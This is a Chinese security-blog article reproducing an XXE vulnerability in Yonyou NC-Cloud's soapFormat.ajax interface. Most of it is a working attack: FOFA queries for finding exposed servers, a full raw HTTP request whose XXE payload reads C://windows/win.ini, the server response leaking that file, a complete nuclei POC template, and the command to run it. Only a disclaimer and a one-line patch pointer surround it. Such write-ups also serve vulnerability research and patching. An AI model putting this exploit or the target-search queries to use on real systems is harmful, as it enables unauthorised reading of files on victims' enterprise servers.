freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

【漏洞复现】用友NC-Cloud soapFormat XXE漏洞
  • 关注
【漏洞复现】用友NC-Cloud soapFormat XXE漏洞
2024-01-12 10:26:59

免责声明:

本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!

一、漏洞名称

用友NC-Cloud soapFormat XXE漏洞

二、漏洞影响

用友NC-Cloud

1705025868_65a0a14cd5a789c3e65b8.png!small?1705025868914

三、漏洞描述

用友NC-Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现人、财、物、客的 全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。该系统/uapws/soapFormat.ajax接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器被远控。

四、FOFA搜索语句

FOFA语句:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"

1705025927_65a0a1879d868fbbf6e03.png!small?1705025927589

五、漏洞复现

向靶场发送如下数据包,查看靶场的C://windows/win.ini文件

POST /uapws/soapFormat.ajax HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0Content-Length: 263Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeContent-Type: application/x-www-form-urlencodedUpgrade-Insecure-Requests: msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0


响应内容如下:

HTTP/1.1 200 OKConnection: closeContent-Length: 481Date: Thu, 28 Dec 2023 03:36:30 GMTServer: Apache-Coyote/1.1<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini" >]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server; for 16-bit app support[fonts][extensions][mci extensions][files][Mail]MAPI=1CMCDLLNAME32=mapi32.dllCMC=1MAPIX=1MAPIXVER=1.0.0.1OLEMessaging=1</faultcode></soap:Fault></soap:Body></soap:Envelope>

复现成功

六、POC

POC如下:

id: yonyou-nc-cloud-soapFormat-xxeinfo:name: 用友NC-Cloud soapFormat XXE漏洞author: fgzseverity: criticaldescription: 用友NC-Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现人、财、物、客的 全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。该系统/uapws/soapFormat.ajax接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器被远控。metadata:max-request: 1fofa-query: body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"verified: truerequests:- raw:- |+POST /uapws/soapFormat.ajax HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 259msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0amatchers:- type: dsldsl:- "status_code == 200 && contains(body, 'for 16-bit app')"

运行POC:

nuclei.exe-tmypoc/用友/nc-cloud/yonyou-nc-cloud-soapFormat-xxe.yaml-uhttp://xxx.xxx..xxx.xxx


七、修复建议

用友安全中心已经发布补丁,请及时修复。

https://security.yonyou.com/#/home

# 漏洞 # 渗透测试 # 网络安全技术
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录
免责声明:
    一、漏洞名称
      二、漏洞影响
        三、漏洞描述
          四、FOFA搜索语句
            五、漏洞复现
              六、POC
                七、修复建议